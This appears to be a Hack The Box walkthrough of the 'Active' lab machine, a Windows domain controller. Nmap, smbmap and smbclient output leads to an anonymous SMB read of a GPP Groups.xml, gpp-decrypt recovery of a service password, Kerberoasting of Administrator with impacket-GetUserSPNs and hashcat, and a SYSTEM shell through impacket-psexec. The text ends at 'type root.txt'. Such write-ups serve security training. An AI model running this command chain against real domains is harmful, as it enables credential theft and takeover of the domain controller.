Active

, , , , , , , , ,

Tools

  • smbmap
  • smbclient
  • gpp-decrypt
  • impacket-GetUserSPNs
  • impacket-psexec

Getting User

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV 10.129.7.159                          
[sudo] password for kali: 
Sorry, try again.
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-06 14:09 EST
Nmap scan report for 10.129.7.159
Host is up (0.24s latency).
Not shown: 983 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-02-06 19:14:07Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 314.75 seconds

Foothold

added the ldap domain to hosts

1
echo '10.129.7.159 active.htb' | sudo tee -a /etc/hosts

used smbmap to enumerate shares

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(kali㉿kali)-[~]
└─$ smbmap -H active.htb

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                          
                                                                                                                             
[+] IP: 10.129.7.159:445        Name: active.htb                Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 
        Users                                                   NO ACCESS
[*] Closed 1 connections

then connected to the smb share with READ ONLY to look for something useful

1
smbclient //active.htb/Replication -N

looking through folders manually was slow, decided to use smbmap to enumerate the Replication share recursively with 20 depth to be faster

1
smbmap -H active.htb -r Replication --depth 20

and found this xml

1
2
3
4
5
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups
dr--r--r--                0 Sat Jul 21 06:37:44 2018    .
dr--r--r--                0 Sat Jul 21 06:37:44 2018    ..
fr--r--r--              533 Sat Jul 21 06:38:11 2018    Groups.xml

connected with smbclient to download the file

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/htb/active]
└─$ smbclient //active.htb/Replication -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> cd active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\>

the file contains a user with a hashed password

1
2
3
4
5
┌──(kali㉿kali)-[~/htb/active]
└─$ cat Groups.xml                                              
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

the password is a classic GPP cpassword, encrypted with a known static AES key

1
2
3
4
┌──(kali㉿kali)-[~/htb/active]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

GPPstillStandingStrong2k18

so the credentials are active.htb\SVC_TGS:GPPstillStandingStrong2k18

used smbmap to enumerate again with these credentials, and Users and SYSVOL are now accessible

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(kali㉿kali)-[~/htb/active]
└─$ smbmap -u SVC_TGS -p GPPstillStandingStrong2k18 -H active.htb

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                          
                                                                                                                             
[+] IP: 10.129.7.159:445        Name: active.htb                Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share 
        Users                                                   READ ONLY
[*] Closed 1 connections

the flag can now be retrieved by accessing SVC_TGS‘s desktop 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali㉿kali)-[~/htb/active]
└─$ smbclient -U SVC_TGS%GPPstillStandingStrong2k18 //active.htb/Users -L
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sat Jul 21 10:39:20 2018
  ..                                 DR        0  Sat Jul 21 10:39:20 2018
  Administrator                       D        0  Mon Jul 16 06:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 01:06:44 2009
  Default                           DHR        0  Tue Jul 14 02:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 01:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009
  Public                             DR        0  Tue Jul 14 00:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018
                5217023 blocks of size 4096. 278873 blocks available
smb: \> cd SVC_TGS\Desktop\
smb: \SVC_TGS\Desktop\> ls
  .                                   D        0  Sat Jul 21 11:14:42 2018
  ..                                  D        0  Sat Jul 21 11:14:42 2018
  user.txt                           AR       34  Fri Feb  6 13:56:16 2026

                5217023 blocks of size 4096. 278873 blocks available

Getting Root

Information Gathering

so i tried impacket-GetUserSPNs to find and request kerberos ticket for the user account

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿kali)-[~/htb/active]
└─$ impacket-GetUserSPNs active.htb/SVC_TGS:'GPPstillStandingStrong2k18' -dc-ip active.htb -request

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2026-02-06 13:56:18.323742             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$b941a5da384234be6cf4ea76bf26b208$94ad926b4a7d89b9a1db896444caed2f9b0b92350a3554572c69d4bb3164165486ca3e96a4efaa32e078c5ff43d4b1ab9a94da6badba73c9272de11378c7fb4a3c8a58fd304936f8bcb0f55be913234ea4fb048efbb14a24671a51cfb55192f2212d14dae8a5253f92638144056d743e53b229ac1b58f16157d6b4b544417849523ead71631a82acf93bc6bf33c876ebc480441af0e37248662bd80e082bb67296862066df913c9757e6fa68317bec7f3ca8b00617def5cac401f1eb85b60707bd99d36a7432412606e27974fd6083b7c12edf54e3428c0cf8ac7959b8b642e7408ed91fe186f4f5b31dd7979692978de6fef3511542c590c484969f42bc295fe4f64f5679e2a9ee872bb0f8e7c188b777881a5ae85d2c34fb57acc68c7334e4a04ff9d63ae80fc37ec45fe0b95e9e66a729a2ee8c667379c85003e6c0bd21ca0812b93ad916c11989cd5af90f5adfb2594b4fbcd83e1853ff74af8845e9367a0f203e282f567fb458534ec990e523318c8fc9b0dec95946a1d8af1ee6dc9da556a3b97baac0859fc62977187a73cd899bd24faad47d181c3cc3baf12ab0a92e10809901e1c2d06486ff78f886566591ec95abec689f04e9a152280261515bbe264e5da8e6c14b4af33c4e28fc50364b9ed9b3f17d02e92fda82a53a335db647d880eefdb906a12d65bbbecaf6ae871ccc081c20895a2df43f9656a2519820d1fafe565676529667d196775f8acf357e91de111ab921c552d1777420aef6c4c3ca9e2b8b702a8d919b738992949e981aa18a93f0f0b73c73f8b96fe67cc4093f759d40b51626b19e0e3be72126518dfff54e1960aae2949d0a472e490f748e75d5a0520191d6d03b1773a6e85ff7b5b067566718a4a3cf0cc9e0c20c0240ff211af3d05d60bd945613f0c9e0e7642878c096c17e15e3d4cef185108c81a92ff9f5415bf2be0785cef6f50de075dc4093fa529228e78f6703d103cd9f0f15dd534856f7b6f3d7e59245642a62144dfa45d5adff39ad7b3cdd147e5db00db3f66e5c4d664acd91e649ddcbbe858ab4960a12ebc3249fb51147c4d026358352cb2502249101842462890c7e2008b674e0730bc794aecc386a50c72345b6102a675d09c54d3577aaaa133232b1fa5b9d41ae4f168284872fadc0b83451b2621bee73421d8bb55fe47fb217509f4691b4d1c684869c3fb35a3838af1173d73b955bfb2f0b22e5f60c2c68fcf5734237b3f44d6ef5077250e3e4e154db

Privilege Escalation**

then ran the same command but to output the result to a file 

1
impacket-GetUserSPNs active.htb/SVC_TGS:'GPPstillStandingStrong2k18' -dc-ip active.htb -request > tgs.txt

i can now crack the password with haschat 

1
hashcat tgs.txt /usr/share/wordlists/rockyou.txt

the cracked password is Ticketmaster1968

i tried to login with evil-wirrm but it didn’t work

next, i tried with impacket-psexec which gave me shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(kali㉿kali)-[~/htb/active]
└─$ impacket-psexec active.htb/Administrator:'Ticketmaster1968'@active.htb
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on active.htb.....
[*] Found writable share ADMIN$
[*] Uploading file mHNmArAh.exe
[*] Opening SVCManager on active.htb.....
[*] Creating service iDnx on active.htb.....
[*] Starting service iDnx.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> dir
 Directory of C:\Users\Administrator\Desktop
06/02/2026  08:56 ��                34 root.txt

               1 File(s)             34 bytes
               2 Dir(s)   1.142.329.344 bytes free

C:\Users\Administrator\Desktop> type root.txt